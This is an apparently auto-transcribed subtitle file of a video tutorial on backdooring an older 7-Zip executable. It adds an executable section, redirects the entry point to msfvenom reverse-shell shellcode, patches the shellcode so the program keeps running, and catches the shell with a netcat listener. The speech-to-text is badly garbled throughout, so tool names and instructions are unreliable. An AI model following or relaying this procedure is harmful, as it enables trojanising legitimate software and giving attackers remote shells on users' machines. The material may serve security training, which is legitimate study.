1 00:00:00,150 --> 00:00:04,970 Hello, everyone, welcome to a new viewers of our back during P series. 2 00:00:06,570 --> 00:00:14,910 Today, we are going to learn how to backdoor a file using lower P and X 30 to debug program and some 3 00:00:14,910 --> 00:00:16,500 reverse engineering techniques. 4 00:00:18,630 --> 00:00:29,210 The tools we are going to need in this video is lower P X 30 to debug Edge X D Hex editor and sends 5 00:00:29,220 --> 00:00:29,480 it. 6 00:00:30,600 --> 00:00:33,150 We're going to back door to seven zip itself. 7 00:00:33,540 --> 00:00:39,150 The seven zip I'm using is an older version of the seven zip which has a slot turned off. 8 00:00:40,620 --> 00:00:42,890 The version I'm using is version seventeen. 9 00:00:42,900 --> 00:00:44,760 You can download it from SourceForge. 10 00:00:46,200 --> 00:00:47,180 Should be easy. 11 00:00:48,750 --> 00:00:52,500 Let's start by copying our seven zip file to our desktop. 12 00:01:15,420 --> 00:01:22,080 Now let's open lower key and then click on P editor, then browse for the seven zip file. 13 00:01:33,430 --> 00:01:35,320 Next, we click on sections. 14 00:01:39,370 --> 00:01:47,890 We can see all sections here, click on the last one and choose at Section header, I have to click 15 00:01:49,300 --> 00:01:50,350 add section header. 16 00:01:53,080 --> 00:01:57,940 Now we need to edit this section by clicking on it and choose edits section header. 17 00:02:03,820 --> 00:02:04,810 Let's give it a name. 18 00:02:09,590 --> 00:02:10,440 Mike test. 19 00:02:11,820 --> 00:02:17,610 Now we need to change the virtual and the Rossides to one thousand bytes you can make unless you can 20 00:02:17,610 --> 00:02:18,870 make it more, it's up to you. 21 00:02:34,850 --> 00:02:37,040 OK, close it. 22 00:02:38,930 --> 00:02:43,910 OK, there's something I missed, which is the flag, let's just open it again. 23 00:02:54,940 --> 00:03:01,360 Click on facts, make sure they're all read right and executable code, because we are going to execute 24 00:03:01,360 --> 00:03:07,480 our code from this section, so we need to make sure it has the executable code checked on. 25 00:03:14,700 --> 00:03:19,830 Since we haven't defined this new section yet, which is going to air if we try to open seven zip now. 26 00:03:23,690 --> 00:03:31,390 To fix this, we will open this file in any Hex editor in our case, we will open in Høst. 27 00:03:36,470 --> 00:03:41,240 File open, let's choose our file. 28 00:03:49,120 --> 00:03:52,810 Now, go to the last, buy it all the way to the bottom. 29 00:03:59,180 --> 00:04:00,830 Put the put the cursor here, 30 00:04:03,770 --> 00:04:08,810 then choose insert bytes from the file, I mean, from the edit menu. 31 00:04:11,950 --> 00:04:17,860 Put any number of votes you want to fill since the election was one thousand buys, we write one thousand 32 00:04:17,860 --> 00:04:21,430 and the body count, we'll leave everything else the same. 33 00:04:40,190 --> 00:04:42,850 Now, let's verify that we can open the application now. 34 00:04:47,680 --> 00:04:48,190 Very good. 35 00:04:53,770 --> 00:04:58,360 Now, let's open this application in 30 to the park and go to the entry point. 36 00:05:15,300 --> 00:05:23,460 We are at the entry point now, if we go to memory map, you can see the structure of all the section 37 00:05:23,460 --> 00:05:24,620 within the application. 38 00:05:25,860 --> 00:05:30,300 Notice our section that we just created that test. 39 00:05:40,600 --> 00:05:47,230 Now, before we continue, we need to redirect the entry point to our new section, and once we are 40 00:05:47,230 --> 00:05:51,480 done executing our new section, we need to come back here again. 41 00:05:51,490 --> 00:05:54,610 So the execution flow of the application doesn't get corrupted. 42 00:05:56,350 --> 00:06:01,330 First, let's look again at our new section and copy its memory address from the memory map. 43 00:06:38,160 --> 00:06:46,320 Now, let's look at the first instruction, which is push SBP, this instruction is on one of up code, 44 00:06:46,830 --> 00:06:48,020 which is fifty five. 45 00:06:50,070 --> 00:06:55,470 But if we change this instruction into something like don't, then that instruction will be corrupted 46 00:06:55,650 --> 00:07:02,370 because they don't have the same code and we will override the instruction next to it if we want to 47 00:07:02,370 --> 00:07:04,290 replace it by dumping instruction. 48 00:07:04,680 --> 00:07:12,900 The jump instruction by itself is not one code, but if we jump to a memory address, it will require 49 00:07:12,900 --> 00:07:19,100 five hex characters, one for the code and four for the memory address we are jumping to. 50 00:07:21,480 --> 00:07:30,840 But if we look at the entry point instruction push SBP and the next two instructions movie PSP push 51 00:07:31,260 --> 00:07:33,870 f f f f f f f f. 52 00:07:34,980 --> 00:07:38,100 They are a total of five hex characters. 53 00:07:38,730 --> 00:07:46,380 So if we replace this instruction by jump and then the memory address of our new section, it will replace 54 00:07:46,380 --> 00:07:48,030 all the three instructions. 55 00:07:48,330 --> 00:07:49,440 But we don't want that. 56 00:07:50,760 --> 00:07:55,590 So says we need these three instructions later to continue the flow of our program. 57 00:07:55,590 --> 00:07:57,810 We will save them in a text file. 58 00:08:12,130 --> 00:08:15,340 Right, click binary copy. 59 00:08:31,800 --> 00:08:40,960 Since I really stepped in one time, so I'm here now, I'm going to reopen this application and import 60 00:08:40,960 --> 00:08:41,830 Sevenzo file. 61 00:08:51,250 --> 00:08:57,160 Again, we are at the entry point now since we saved the first three destruction's, we can replace 62 00:08:57,160 --> 00:09:01,510 the first one with jump and then the memory address of our new section. 63 00:09:04,390 --> 00:09:11,140 We had space and then we type jump and then the readers of the new section. 64 00:09:20,200 --> 00:09:25,240 Now, if we step into it will go to our new section. 65 00:09:26,570 --> 00:09:31,610 Now let's save this file as a new copy so we can leave this first copy intact. 66 00:09:32,290 --> 00:09:34,510 We're going to patch it file. 67 00:09:37,310 --> 00:09:40,620 Patch file, and then we choose patch file again. 68 00:09:41,150 --> 00:09:41,900 We give it a name. 69 00:09:49,240 --> 00:09:51,190 From now on, we will work on the new one. 70 00:10:05,190 --> 00:10:10,170 Now, there is another problem, if you remember, from our stack, from the Linux binary exploitation 71 00:10:10,170 --> 00:10:16,110 videos, it needs to be the same when we are done executing the new section and return back to the next 72 00:10:16,110 --> 00:10:18,180 instruction after the entry point. 73 00:10:21,660 --> 00:10:27,930 Which if this is our entry point, we need to come back to this instruction, the very first instruction 74 00:10:27,960 --> 00:10:34,350 after the entry point, because if we jump back to this back to this instruction and we said that we 75 00:10:34,350 --> 00:10:40,890 said earlier with the stick and registers having different values than the initial values we stored 76 00:10:40,890 --> 00:10:44,730 in them, the program won't run and it will crash. 77 00:10:45,870 --> 00:10:51,780 With that said, we need to push all registers onto the stack and restore them back right before we 78 00:10:51,780 --> 00:10:55,460 restore the first three instructions in the program that we just saved. 79 00:10:56,460 --> 00:10:59,640 Let's first step into one time and go to our new section. 80 00:11:01,150 --> 00:11:01,500 Good. 81 00:11:03,270 --> 00:11:10,320 Now, let's say the registers and the flags on the left side here, we're going to push them on the 82 00:11:10,320 --> 00:11:14,250 stack by using the push aid instruction and push F.T.. 83 00:11:26,960 --> 00:11:29,210 Let's save this file has seven zip three. 84 00:11:55,210 --> 00:12:01,510 We are back at the entry point since we need this next instruction after the entry point anyway, so 85 00:12:01,510 --> 00:12:05,200 we need the memory address and we will save it into a text file. 86 00:12:26,760 --> 00:12:30,450 Let's continue and go to our news section by clicking step into. 87 00:12:33,210 --> 00:12:38,340 Now let's create our reverse shall TCP payload without with massive venom. 88 00:13:09,450 --> 00:13:14,270 OK, let's copy our show code to the text file. 89 00:13:26,080 --> 00:13:31,530 Let's copy and paste our show code into our program here, using the ignore size option. 90 00:13:34,980 --> 00:13:37,800 Binary paste with ignore exorcize. 91 00:13:41,930 --> 00:13:48,500 It's all good, but there's one problem here with our Chalco and massive venom Chalco, it has an infinite 92 00:13:48,500 --> 00:13:55,400 waiting time code waiting for a single object and that will prevent the execution flow from continuing 93 00:13:55,640 --> 00:13:57,410 after we get our show. 94 00:14:03,200 --> 00:14:10,760 This instruction deck IACI, which decrements he is, AICI, will make the value of the register negative 95 00:14:10,760 --> 00:14:12,380 one, which is infinite. 96 00:14:13,220 --> 00:14:20,780 Since we don't want to be infinite, we will leave it zero and change this instruction to not no operation. 97 00:14:21,800 --> 00:14:25,400 Let's find this block of code in our theory to debug. 98 00:14:45,370 --> 00:14:46,480 Now, let's compare them. 99 00:14:51,360 --> 00:14:53,420 Looks like this is done, we are looking for. 100 00:15:03,320 --> 00:15:10,580 One more thing, if you look at the shoket, there is one called SBP at the end, this will make the 101 00:15:10,590 --> 00:15:15,100 show code call the exit function, but we don't want our program to exit. 102 00:15:15,110 --> 00:15:15,390 Right. 103 00:15:16,670 --> 00:15:19,280 We can also not this instruction from now on. 104 00:15:19,280 --> 00:15:20,960 Let's break point on it. 105 00:15:45,100 --> 00:15:52,360 Since we pushed F.D. an ad at the top, we need to pop them back to restore our all our registers and 106 00:15:52,360 --> 00:15:53,060 our flags. 107 00:15:53,980 --> 00:15:54,910 Let's do that here. 108 00:16:04,510 --> 00:16:11,630 Keep in mind that they have to be in reverse, so if we did push, push aid first, then we do pop aid 109 00:16:11,630 --> 00:16:12,060 west. 110 00:16:13,220 --> 00:16:17,700 Now, let's pay us to three instructions that we have saved in the very beginning. 111 00:16:31,430 --> 00:16:37,100 Then the last instruction is to jump to the entry point, to continue with the execution flow of the 112 00:16:37,100 --> 00:16:37,580 program. 113 00:16:38,540 --> 00:16:40,310 We really have the address saved. 114 00:16:45,230 --> 00:16:46,880 Let's jump to this address. 115 00:16:52,850 --> 00:16:56,360 I'm going to save this file within your name. 116 00:17:12,490 --> 00:17:15,100 Let's talk in a minute, CAF listener for our connection. 117 00:17:34,600 --> 00:17:35,020 Hoopes. 118 00:17:37,860 --> 00:17:41,100 We got our shell, but the program still crashed. 119 00:17:42,030 --> 00:17:43,230 Let's find out why. 120 00:18:06,990 --> 00:18:13,740 The reason why this happened is the civil rights E.S.P was changed from what we have saved on the stack 121 00:18:13,740 --> 00:18:14,230 before. 122 00:18:16,500 --> 00:18:23,370 Let's first check where the ASP is pointing at after the first push ad and push f the instruction. 123 00:18:26,410 --> 00:18:33,120 Going to step into now this is the beginning of our so-called let's check. 124 00:18:33,370 --> 00:18:34,900 Where is this pointing at? 125 00:18:40,660 --> 00:18:42,310 Let's save save this address. 126 00:18:53,140 --> 00:19:02,260 Now, let's go all the way down to our knob and obstruction right before our pop F.T. and Pop 80, I 127 00:19:02,260 --> 00:19:07,900 already have a breakpoint here and let's continue and see what's the new value of our E.S.P. 128 00:19:21,140 --> 00:19:24,410 He is pointing at a different location. 129 00:19:26,180 --> 00:19:27,110 Let's save this one. 130 00:19:39,040 --> 00:19:40,240 They are not the same. 131 00:19:40,620 --> 00:19:48,300 That's why when we tried to pop back all the values in the registers and E flags, they ESP was not 132 00:19:48,300 --> 00:19:50,470 pointing at the same as before. 133 00:19:51,270 --> 00:19:56,580 So we need to adjust our stack to make our point at the right location. 134 00:19:57,660 --> 00:20:04,980 Let's calculate the difference between a calc in the program and make sure it's. 135 00:20:06,510 --> 00:20:10,750 This is the very initial value and this is the new one. 136 00:20:11,610 --> 00:20:12,570 Let's subtract. 137 00:20:23,110 --> 00:20:31,840 We got two hundred and four in Hex, so we need to add this value to DP to adjust to make it point to 138 00:20:31,840 --> 00:20:33,640 the right memory address. 139 00:20:34,780 --> 00:20:37,420 So instead of our two knobs here, we will change. 140 00:20:37,420 --> 00:20:42,700 It will add up to a four. 141 00:20:48,800 --> 00:20:59,180 But notice the corrupted our instructions after it, right, let's correct that again, Pop, F.T. Pop, 142 00:21:01,760 --> 00:21:03,530 and then our three instructions. 143 00:21:16,820 --> 00:21:18,670 And then our job. 144 00:21:38,450 --> 00:21:41,360 Now, let's save it at a new as a new file. 145 00:21:57,900 --> 00:21:59,970 Let's start our next listener again. 146 00:22:13,980 --> 00:22:18,240 Nice, we got our show and we still was able to open our program. 147 00:22:18,870 --> 00:22:19,410 Very good. 148 00:22:20,820 --> 00:22:22,300 This was the end of our video. 149 00:22:22,530 --> 00:22:24,600 Thanks for watching and see you in the next one.